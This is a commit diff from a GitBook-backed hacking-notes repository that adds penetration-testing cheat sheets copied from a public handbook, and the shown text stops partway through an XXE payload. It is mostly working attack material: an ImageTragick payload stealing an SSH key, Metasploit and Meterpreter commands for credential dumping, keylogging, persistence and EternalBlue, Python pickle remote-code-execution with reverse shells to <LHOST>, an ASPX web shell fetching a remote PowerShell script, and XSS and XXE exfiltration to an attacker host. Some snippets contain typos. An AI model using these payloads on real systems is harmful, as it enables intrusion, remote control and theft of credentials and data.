STRLCPY/Cipherops

GITBOOK-33: change request with no subject merged in GitBook
Adwaith committed with gitbook-bot 1 year ago

336ecdb1

1 parent a58348db

■ ■ ■ ■ ■ ■

SUMMARY.md

		skipped 47 lines
48	48
49	49		## 🐦 Twitter
50	50
51		-	* [✖ Tips and Tricks From Twitter](twitter/tips-and-tricks-from-twitter.md)
52		-	* [✖ Thread by @ArchAngelDDay on Thread Reader App](twitter/thread-by-archangeldday-on-thread-reader-app.md)
	51	+	* [✖ Tips and Tricks From Twitter](twitter-threads/tips-and-tricks-from-twitter.md)
	52	+	* [✖ Thread by @ArchAngelDDay on Thread Reader App](twitter-threads/thread-by-archangeldday-on-thread-reader-app.md)
53	53		* [✖ people to follow on twitter](https://twitter.com/PhillipWylie/status/1682404653391118337?t=Fev86JGEbHFWv66CL8\_7Jw\&s=08)
54	54
55	55		***
		skipped 10 lines
66	66
67	67		## ⚒ Tools
68	68
	69	+	* [🇬🇹 Hacking Templates](tools/hacking-templates.md)
69	70		* [Axion-Scan](tools/axion-scan.md)
70		-	* [Shodan Pentesting Guide](tools/shodan-pentesting-guide/README.md)
71		-	* [Shodan Dorks](tools/shodan-pentesting-guide/shodan-dorks.md)
	71	+	* [Shodan Pentesting Guide](tools/shodan-pentesting-guide.md)
	72	+	* [Shodan Dorks](overview/google-hacking-using-dorks/shodan-dorks.md)
72	73
73	74		***
74	75
		skipped 4 lines
79	80		* [Hacking-Cheatsheet](cheat-sheets/hacking-cheatsheet.md)
80	81		* [Medium and other articles links](medium-and-other-articles-links.md)
81	82
	83	+	## ❗ Exploitation
	84	+
	85	+	* [Exploitation notes](exploitation/exploitation-notes.md)
	86	+	* [Post Exploitation](exploitation/post-exploitation.md)
	87	+

■ ■ ■ ■ ■ ■

exploitation/exploitation-notes.md

1	+	---
2	+	description: >-
3	+	Refernce :
4	+	https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md
5	+	---
6	+
7	+	# Exploitation notes
8	+
9	+	## Exploitation Tools
10	+
11	+	* [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#Resources)
12	+
13	+	### Table of Contents
14	+
15	+	* [ImageTragick](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#ImageTragick)
16	+	* [MSL / Polyglot Attack](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#msl--polyglot-attack)
17	+	* [Metasploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#Metasploit)
18	+	* [searchsploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#searchsploit)
19	+
20	+	### Resources
21	+
22	+	\| Name \| Description \| URL \|
23	+	\| ------------ \| ---------------------------------------------------------------------------------------------------------------------------------------------------------------- \| ---------------------------------------------- \|
24	+	\| Evil-WinRM \| The ultimate WinRM shell for hacking/pentesting \| https://github.com/Hackplayers/evil-winrm \|
25	+	\| Exploitalert \| Listing of latest Exploits \| https://exploitalert.com \|
26	+	\| Metasploit \| Metasploit Framework \| https://github.com/rapid7/metasploit-framework \|
27	+	\| TheFatRat \| TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. \| https://github.com/Screetsec/TheFatRat \|
28	+
29	+	### ImageTragick
30	+
31	+	> https://imagetragick.com/
32	+
33	+	### MSL / Polyglot Attack
34	+
35	+	> https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
36	+
37	+	#### poc.svg
38	+
39	+	```c
40	+	<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
41	+	<read filename="pdf:/etc/passwd"/>
42	+	<get width="base-width" height="base-height" />
43	+	<resize geometry="400x400" />
44	+	<write filename="test.png" />
45	+	<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
46	+	<image xlink:href="msl:poc.svg" height="100" width="100"/>
47	+	</svg>
48	+	</image>
49	+	```
50	+
51	+	#### Executing Payload
52	+
53	+	```c
54	+	$ convert poc.svg poc.png
55	+	$ cp /tmp/poc.svg /var/www/html/convert_images/
56	+	```
57	+
58	+	### Metasploit
59	+
60	+	> https://github.com/rapid7/metasploit-framework
61	+
62	+	> https://github.com/rapid7/metasploit-payloads
63	+
64	+	#### General Usage
65	+
66	+	```c
67	+	$ sudo msfdb run // start database
68	+	$ sudo msfdb init // database initialization
69	+	$ msfdb --use-defaults delete // delete existing databases
70	+	$ msfdb --use-defaults init // database initialization
71	+	$ msfdb status // database status
72	+	msf6 > workspace // metasploit workspaces
73	+	msf6 > workspace -a <WORKSPACE> // add a workspace
74	+	msf6 > workspace -r <WORKSPACE> // rename a workspace
75	+	msf6 > workspace -d <WORKSPACE> // delete a workspace
76	+	msf6 > workspace -D // delete all workspaces
77	+	msf6 > db_nmap <OPTIONS> // execute nmap and add output to database
78	+	msf6 > hosts // reads hosts from database
79	+	msf6 > services // reads services from database
80	+	msf6 > vulns // displaying vulnerabilities
81	+	msf6 > search // search within metasploit
82	+	msf6 > set RHOST <RHOST> // set remote host
83	+	msf6 > set RPORT <RPORT> // set remote port
84	+	msf6 > run // run exploit
85	+	msf6 > spool /PATH/TO/FILE // recording screen output
86	+	msf6 > save // saves current state
87	+	msf6 > exploit // using module exploit
88	+	msf6 > payload // using module payload
89	+	msf6 > auxiliary // using module auxiliary
90	+	msf6 > encoder // using module encoder
91	+	msf6 > nop // using module nop
92	+	msf6 > show sessions // displays all current sessions
93	+	msf6 > sessions -i 1 // switch to session 1
94	+	msf6 > sessions -u <ID> // upgrading shell to meterpreter
95	+	msf6 > sessions -k <ID> // kill specific session
96	+	msf6 > sessions -K // kill all sessions
97	+	msf6 > jobs // showing all current jobs
98	+	msf6 > show payloads // displaying available payloads
99	+	msf6 > set VERBOSE true // enable verbose output
100	+	msf6 > set forceexploit true // exploits the target anyways
101	+	msf6 > set EXITFUNC thread // reverse shell can exit without exit the program
102	+	msf6 > set AutoLoadStdapi false // disables autoload of stdapi
103	+	msf6 > set PrependMigrate true // enables automatic process migration
104	+	msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe
105	+	msf6 > use post/PATH/TO/MODULE // use post exploitation module
106	+	msf6 > use post/linux/gather/hashdump // use hashdump for Linux
107	+	msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter
108	+	msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module
109	+	C:\> > Ctrl + z // put active meterpreter shell in background
110	+	meterpreter > loadstdapi // load stdapi
111	+	meterpreter > background // put meterpreter in background (same as "bg")
112	+	meterpreter > shell // get a system shell
113	+	meterpreter > channel -i <ID> // get back to existing meterpreter shell
114	+	meterpreter > ps // checking processes
115	+	meterpreter > migrate 2236 // migrate to a process
116	+	meterpreter > getuid // get the user id
117	+	meterpreter > sysinfo // get system information
118	+	meterpreter > search -f <FILE> // search for a file
119	+	meterpreter > upload // uploading local files to the target
120	+	meterpreter > ipconfig // get network configuration
121	+	meterpreter > load powershell // loads powershell
122	+	meterpreter > powershell_shell // follow-up command for load powershell
123	+	meterpreter > powershell_execute // execute command
124	+	meterpreter > powershell_import // import module
125	+	meterpreter > powershell_shell // shell
126	+	meterpreter > powershell_session_remove // remove
127	+	meterpreter > powershell_execute 'Get-NetNeighbor \| Where-Object -Property State -NE "Unreachable" \| Select-Object -Property IPAddress' // network discovery
128	+	meterpreter > powershell_execute '1..254 \| foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }' // network scan
129	+	meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 \| Select-Object -Property RemotePort, TcpTestSucceeded' // port scan
130	+	meterpreter > load kiwi // load mimikatz
131	+	meterpreter > help kiwi // mimikatz help
132	+	meterpreter > kiwi_cmd // execute mimikatz native command
133	+	meterpreter > lsa_dump_sam // lsa sam dump
134	+	meterpreter > dcsync_ntlm krbtgt // dc sync
135	+	meterpreter > creds_all // dump all credentials
136	+	meterpreter > creds_msv // msv dump
137	+	meterpreter > creds_kerberos // kerberos dump
138	+	meterpreter > creds_ssp // ssp dump
139	+	meterpreter > creds_wdigest // wdigest dump
140	+	meterpreter > getprivs // get privileges after loading mimikatz
141	+	meterpreter > getsystem // gain system privileges if user is member of administrator group
142	+	meterpreter > hashdump // dumps all the user hashes
143	+	meterpreter > run post/windows/gather/checkvm // check status of the target
144	+	meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits
145	+	meterpreter > run post/windows/manage/enable_rdp // enables rdp
146	+	meterpreter > run post/multi/manage/autoroute // runs autoroutes
147	+	meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server
148	+	meterpreter > keyscan_start // enabled keylogger
149	+	meterpreter > keyscan_dump // showing the output
150	+	meterpreter > screenshare // realtime screen sharing
151	+	meterpreter > screenshare -q 100 // realtime screen sharing
152	+	meterpreter > record_mic // recording mic output
153	+	meterpreter > timestomp // modify timestamps
154	+	meterpreter > execute -f calc.exe // starts a program on the victim
155	+	meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1 // port forwarding
156	+	```
157	+
158	+	#### Metasploit through Proxychains
159	+
160	+	```c
161	+	$ proxychains -q msfconsole
162	+	```
163	+
164	+	#### Meterpreter Listener
165	+
166	+	Generate Payload
167	+
168	+	```c
169	+	$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
170	+	```
171	+
172	+	Setup Listener for Microsoft Windows
173	+
174	+	```c
175	+	msf6 > use exploit/multi/handler
176	+	[*] Using configured payload generic/shell_reverse_tcp
177	+	msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
178	+	payload => windows/x64/meterpreter/reverse_tcp
179	+	msf6 exploit(multi/handler) > set LHOST <LHOST>
180	+	LHOST => <LHOST>
181	+	msf6 exploit(multi/handler) > set LPORT <LPORT>
182	+	LPORT => <LPORT>
183	+	msf6 exploit(multi/handler) > run
184	+	```
185	+
186	+	Setup Listener for MacOS
187	+
188	+	```c
189	+	msf6 > use exploit/multi/handler
190	+	[*] Using configured payload generic/shell_reverse_tcp
191	+	msf6 exploit(multi/handler) > set LHOST <LHOST>
192	+	LHOST => <LHOST>
193	+	msf6 exploit(multi/handler) > set LPORT <LPORT>
194	+	LPORT => <LPORT>
195	+	msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
196	+	PAYLOAD => python/meterpreter/reverse_tcp
197	+	msf6 exploit(multi/handler) > exploit
198	+	```
199	+
200	+	Download Files
201	+
202	+	```c
203	+	$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
204	+	```
205	+
206	+	```c
207	+	msf6 > use exploit/multi/handler
208	+	[*] Using configured payload generic/shell_reverse_tcp
209	+	msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
210	+	payload => windows/x64/meterpreter/reverse_tcp
211	+	msf6 exploit(multi/handler) > set LHOST <LHOST>
212	+	LHOST => <LHOST>
213	+	msf6 exploit(multi/handler) > set LPORT <LPORT>
214	+	LPORT => <LPORT>
215	+	msf6 exploit(multi/handler) > run
216	+	```
217	+
218	+	```c
219	+	C:\> .\<FILE>.exe
220	+	```
221	+
222	+	```c
223	+	meterpreter > download *
224	+	```
225	+
226	+	#### Enumeration
227	+
228	+	SNMP Scan
229	+
230	+	```c
231	+	msf6 > use auxiliary/scanner/snmp/snmp_login
232	+	msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
233	+	msf6 auxiliary(scanner/snmp/snmp_login) > run
234	+	```
235	+
236	+	SNMP Enum
237	+
238	+	```c
239	+	msf6 > use auxiliary/scanner/snmp/snmp_enum
240	+	msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
241	+	msf6 auxiliary(scanner/snmp/snmp_enum) > run
242	+	```
243	+
244	+	Tomcat Enumeration
245	+
246	+	```c
247	+	msf6 > use auxiliary/scanner/http/tomcat_mgr_login
248	+	msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
249	+	msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
250	+	```
251	+
252	+	Exploit Suggester
253	+
254	+	```c
255	+	msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
256	+	msf6 post(multi/recon/local_exploit_suggester) > set session 1
257	+	msf6 post(multi/recon/local_exploit_suggester) > run
258	+	```
259	+
260	+	#### Execute Binaries
261	+
262	+	Port Forwarding with Chisel
263	+
264	+	```c
265	+	meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"
266	+	```
267	+
268	+	#### Pivoting
269	+
270	+	Port Forwarding with Meterpreter
271	+
272	+	```c
273	+	meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
274	+	meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
275	+	```
276	+
277	+	SOCKS Proxy on Meterpreter Sessions
278	+
279	+	```c
280	+	meterpreter > use auxiliary/server/socks_proxy
281	+	```
282	+
283	+	Pivoting with Meterpreter
284	+
285	+	```c
286	+	meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24
287	+	background
288	+	msf > use auxiliary/scanner/portscan/tcp
289	+	```
290	+
291	+	#### Auxiliary Handling
292	+
293	+	Auxiliary Setup
294	+
295	+	```c
296	+	msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
297	+	msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
298	+	msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
299	+	msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
300	+	```
301	+
302	+	Auxiliary Output Directory
303	+
304	+	```c
305	+	/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
306	+	```
307	+
308	+	#### Persistence
309	+
310	+	Setting up Persistent Access
311	+
312	+	```c
313	+	$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
314	+	```
315	+
316	+	Copy exploit to target machine
317	+
318	+	```c
319	+	msf6 > use exploit/windows/local/persistence
320	+	msf6 > set session 1
321	+	msf6 > use windows/meterpreter/reverse_tcp
322	+	```
323	+
324	+	Persistence through persistence\_service
325	+
326	+	```c
327	+	msf6 > use exploit/windows/local/persistence_service
328	+	msf6 > set session 2
329	+	msf6 > set lport 5678
330	+	msf6 > exploit
331	+	```
332	+
333	+	```c
334	+	msf6 > use exploit/multi/handler
335	+	msf6 > set payload windows/meterpreter/reverse_tcp
336	+	msf6 > set lhost <LHOST>
337	+	msf6 > set lport 5678
338	+	msf6 > exploit
339	+	```
340	+
341	+	Persistence through Persistence\_exe
342	+
343	+	```c
344	+	msf6 > use post/windows/manage/persistence_exe
345	+	msf6 > set session 1
346	+	msf6 > set rexepath /root/payload.exe
347	+	msf6 > exploit
348	+	```
349	+
350	+	```c
351	+	msf6 > use exploit/multi/handler
352	+	msf6 > set payload windows/meterpreter/reverse_tcp
353	+	msf6 > set lhost <LHOST>
354	+	msf6 > set lport 1234
355	+	msf6 > exploit
356	+	```
357	+
358	+	Persistence through Registry
359	+
360	+	```c
361	+	msf6 > use exploit/windows/local/registry_persistence
362	+	msf6 > set session 1
363	+	msf6 > set lport 7654
364	+	msf6 > exploit
365	+	```
366	+
367	+	```c
368	+	msf6 > use exploit/multi/handler
369	+	msf6 > set set payload windows/meterpreter/reverse_tcp
370	+	msf6 > set lhost <LHOST>
371	+	msf6 > set lport 7654
372	+	msf6 > exploit
373	+	```
374	+
375	+	#### Exploit Handling
376	+
377	+	WP Shell Upload
378	+
379	+	```c
380	+	msf6 > use exploit/unix/webapp/wp_admin_shell_upload
381	+	msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
382	+	msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
383	+	msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
384	+	msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
385	+	msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
386	+	msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
387	+	msf6 > run
388	+	```
389	+
390	+	```c
391	+	meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
392	+	meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"
393	+	```
394	+
395	+	Dedicated Exploit
396	+
397	+	```c
398	+	msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
399	+	msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
400	+	msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
401	+	msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
402	+	msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
403	+	```
404	+
405	+	Additional Options
406	+
407	+	```c
408	+	msf6 > use exploit/windows/smb/ms17_010_eternalblue
409	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
410	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
411	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
412	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
413	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
414	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
415	+	msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
416	+	```
417	+
418	+	### searchsploit
419	+
420	+	```c
421	+	$ searchsploit <NAME>
422	+	$ searchsploit --cve <CVE>
423	+	$ searchsploit -m <ID>
424	+	$ searchsploit -x <ID> / <PATH>
425	+	```
426	+

exploitation/post-exploitation.md

Diff is too large to be displayed.
tools/shodan-pentesting-guide/shodan-dorks.md overview/google-hacking-using-dorks/shodan-dorks.md

Content is identical

■ ■ ■ ■ ■ ■

overview/resourses/hacking-resources.md

1	1		# Hacking Resources
2	2
	3	+	{% embed url="https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks" %}
	4	+
3	5		* [Hacking Resources](broken-reference)
4	6		* [Usefull Web Browser plugins](broken-reference)
5	7		* [Cool Tools/Labs](broken-reference)
		skipped 310 lines

■ ■ ■ ■ ■ ■

tools/hacking-templates.md

1	+	---
2	+	description: >-
3	+	Reference :
4	+	https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md
5	+	---
6	+
7	+	# 🇬🇹 Hacking Templates
8	+
9	+	### Table of Contents
10	+
11	+	* [01 Information Gathering](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#01-Information-Gathering)
12	+	* [02 Vulnerability Analysis](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#02-Vulnerability-Analysis)
13	+	* [03 Web Application Analysis](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#03-Web-Application-Analysis)
14	+	* [04 Database Assessment](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#04-Database-Assessment)
15	+	* [05 Password Attacks](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#05-Password-Attacks)
16	+	* [06 Wireless Attacks](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#06-Wireless-Attacks)
17	+	* [07 Reverse Engineering](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#07-Reverse-Engineering)
18	+	* [08 Exploitation Tools](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#08-Exploitation-Tools)
19	+	* [09 Sniffing & Spoofing](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#09-Sniffing--Spoofing)
20	+	* [10 Post Exploitation](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#10-Post-Exploitation)
21	+	* [11 Forensics](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#11-Forensics)
22	+	* [12 Reporting Tools](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#12-Reporting-Tools)
23	+	* [13 Social Engineering Tools](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#13-Social-Engineering-Tools)
24	+	* [Basics](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#Basics)
25	+	* [Exploiting](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md#Exploiting)
26	+
27	+	### 01 Information Gathering
28	+
29	+	### 02 Vulnerability Analysis
30	+
31	+	### 03 Web Application Analysis
32	+
33	+	#### Hypertext Markup Language (HTML)
34	+
35	+	Hypertext Markup Language (HTML) Injection
36	+
37	+	```c
38	+	<script>
39	+	x=new XMLHttpRequest;
40	+	x.onload=function(){
41	+	document.write(this.responseText)
42	+	};
43	+	x.open("GET","file:///etc/passwd");
44	+	x.send();
45	+	</script>
46	+	```
47	+
48	+	#### JavaScript (JS)
49	+
50	+	JavaScript (JS) Fetch Uniform Resource Locator (URL) and Base64 Encoding
51	+
52	+	```c
53	+	<script>fetch('http://<RHOST>/auth.php').then(r => r.text()).then(d => fetch("http://<LHOST>"+btoa(d)));</script>
54	+	```
55	+
56	+	```c
57	+	const Req1 = new XMLHttpRequest();
58	+	Req1.open("GET", "http://<RHOST>/index.php", true);
59	+
60	+	Req1.onload = function(Event) {
61	+	const response = btoa(Req1.response);
62	+
63	+	const Req2 = new XMLHttpRequest();
64	+	Req2.open("GET", "http://<LHOST>/?"+response, true);
65	+	Req2.send();
66	+	};
67	+	Req1.send();
68	+	```
69	+
70	+	#### JavaScript Object Notation (JSON)
71	+
72	+	JavaScript Object Notation (JSON) POST Request with Authentication
73	+
74	+	```c
75	+	POST /<PATH> HTTP/1.1
76	+	Host: <RHOST>
77	+	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
78	+	Accept: /
79	+	Accept-Language: en-US,en;q=0.5
80	+	Content-Type: application/json
81	+	Content-Length: 95
82	+	Connection: close
83	+
84	+	{
85	+	"auth":{
86	+	"name":"<USERNAME>",
87	+	"password":"<PASSWORD>"
88	+	},
89	+	"filename":"<FILE>"
90	+	}
91	+	```
92	+
93	+	#### Python
94	+
95	+	Python Pickle Remote Code Execution (RCE)
96	+
97	+	```python
98	+	import pickle
99	+	import sys
100	+	import base64
101	+
102	+	command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f \| /bin/sh -i 2>&1 \| netcat <LHOST> <LHOST> > /tmp/f'
103	+
104	+	class rce(object):
105	+	def __reduce__(self):
106	+	import os
107	+	return (os.system,(command,))
108	+
109	+	print(base64.b64encode(pickle.dumps(rce())))
110	+	```
111	+
112	+	```python
113	+	import base64
114	+	import pickle
115	+	import os
116	+
117	+	class RCE:
118	+	def __reduce__(self):
119	+	cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp/<LHOST>/<LPORT> <&1'")
120	+	return = os.system, (cmd, )
121	+
122	+	if __name__ == '__main__':
123	+	pickle = pickle.dumps(RCE())
124	+	print(bas64.b64encode(pickled))
125	+	```
126	+
127	+	Python Redirect for Server-Side Request Forgery (SSRF)
128	+
129	+	```python
130	+	#!/usr/bin/python3
131	+	import sys
132	+	from http.server import HTTPServer, BaseHTTPRequestHandler
133	+
134	+	class Redirect(BaseHTTPRequestHandler):
135	+	def do_GET(self):
136	+	self.send_response(302)
137	+	self.send_header('Location', sys.argv[1])
138	+	self.end_headers()
139	+
140	+	HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
141	+	```
142	+
143	+	```c
144	+	sudo python3 redirect.py http://127.0.0.1:3000/
145	+	```
146	+
147	+	```python
148	+	#!/usr/bin/env python
149	+
150	+	import SimpleHTTPServer
151	+	import SocketServer
152	+	import sys
153	+	import argparse
154	+
155	+	def redirect_handler_factory(url):
156	+	"""
157	+	returns a request handler class that redirects to supplied `url`
158	+	"""
159	+	class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
160	+	def do_GET(self):
161	+	self.send_response(301)
162	+	self.send_header('Location', url)
163	+	self.end_headers()
164	+
165	+	def do_POST(self):
166	+	self.send_response(301)
167	+	self.send_header('Location', url)
168	+	self.end_headers()
169	+
170	+	return RedirectHandler
171	+
172	+
173	+	def main():
174	+
175	+	parser = argparse.ArgumentParser(description='HTTP redirect server')
176	+
177	+	parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
178	+	parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
179	+	parser.add_argument('redirect_url', action="store")
180	+
181	+	myargs = parser.parse_args()
182	+
183	+	redirect_url = myargs.redirect_url
184	+	port = myargs.port
185	+	host = myargs.ip
186	+
187	+	redirectHandler = redirect_handler_factory(redirect_url)
188	+
189	+	handler = SocketServer.TCPServer((host, port), redirectHandler)
190	+	print("serving at port %s" % port)
191	+	handler.serve_forever()
192	+
193	+	if __name__ == "__main__":
194	+	main()
195	+	```
196	+
197	+	Python Web Request
198	+
199	+	```python
200	+	import requests
201	+	import re
202	+
203	+	http_proxy = "http://127.0.0.1:8080"
204	+	proxyDict = {
205	+	"http" : http_proxy,
206	+	}
207	+	// get a session
208	+	r = requests.get('http://')
209	+	// send request
210	+	r = requests.post('<RHOST>', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)
211	+	```
212	+
213	+	#### Web Shells
214	+
215	+	Active Server Page Extended (ASPX)
216	+
217	+	```c
218	+	<?xml version="1.0" encoding="UTF-8"?>
219	+	<configuration>
220	+	<system.webServer>
221	+	<handlers accessPolicy="Read, Script, Write">
222	+	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
223	+	</handlers>
224	+	<security>
225	+	<requestFiltering>
226	+	<fileExtensions>
227	+	<remove fileExtension=".config" />
228	+	</fileExtensions>
229	+	<hiddenSegments>
230	+	<remove segment="web.config" />
231	+	</hiddenSegments>
232	+	</requestFiltering>
233	+	</security>
234	+	</system.webServer>
235	+	</configuration>
236	+	<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
237	+	<%
238	+	Set s = CreateObject("WScript.Shell")
239	+	Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
240	+	o = cmd.StdOut.Readall()
241	+	Response.write(o)
242	+	%>
243	+	-->
244	+	```
245	+
246	+	#### Extensible Markup Language (XML)
247	+
248	+	Extensible Markup Language (XML) Hypertext Markup Language (HTTP) Request (XHR) in JavaScript (JS)
249	+
250	+	Payload
251	+
252	+	```c
253	+	var xhr = new XMLHttpRequest();
254	+	xhr = new XMLHttpRequest();
255	+	xhr.open('GET', 'http://localhost:8080/users/');
256	+	xhr.onreadystatechange = function() {
257	+	var users = JSON.parse(xhr.responseText);
258	+	if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
259	+	for (var i = 0; i < users.length; ++i) {
260	+	console.table(users[i]);
261	+	}
262	+	} else {
263	+	console.error('There was a problem with the request. ' + users);
264	+	}
265	+	}
266	+	xhr.send();
267	+	```
268	+
269	+	Forged Request
270	+
271	+	```c
272	+	myhttpserver = 'http://<LHOST>/'
273	+	targeturl = 'http://<RHOST>/'
274	+
275	+	req = new XMLHttpRequest;
276	+	req.onreadystatechange = function() {
277	+	if (req.readyState == 4) {
278	+	req2 = new XMLHttpRequest;
279	+	req2.open('GET', myhttpserver + btoa(this.responseText),false);
280	+	req2.send();
281	+	}
282	+	}
283	+	req.open('GET', targeturl, false);
284	+	req.send();
285	+	```
286	+
287	+	Simple Version
288	+
289	+	```c
290	+	req = new XMLHTTPRequest;
291	+	req.open('GET',"http://<RHOST>/revshell.php");
292	+	req.send();
293	+	```
294	+
295	+	#### Extensible Markup Language (XML)
296	+
297	+	Extensible Markup Language (XML) External Entity (XXE)
298	+
299	+	Request
300	+
301	+	```c
302	+	<?xml version="1.0"?>
303	+	<!DOCTYPE foo [<!ENTITY % <NAME> SYSTEM
304	+	"http://<LHOST>/<FILE>.dtd">%<NAME>;]>
305	+	<root>
306	+	<method>GET</method>
307	+	<uri>/</uri>
308	+	<user>
309	+	<username><NAME>;</username>
310	+	<password><NAME></password>
311	+	</user>
312	+	</root>
313	+	```
314	+
315	+	Content of .dtd
316	+
317	+	```c
318	+	<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd">
319	+	<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<LHOST>/?f=%file;'>">
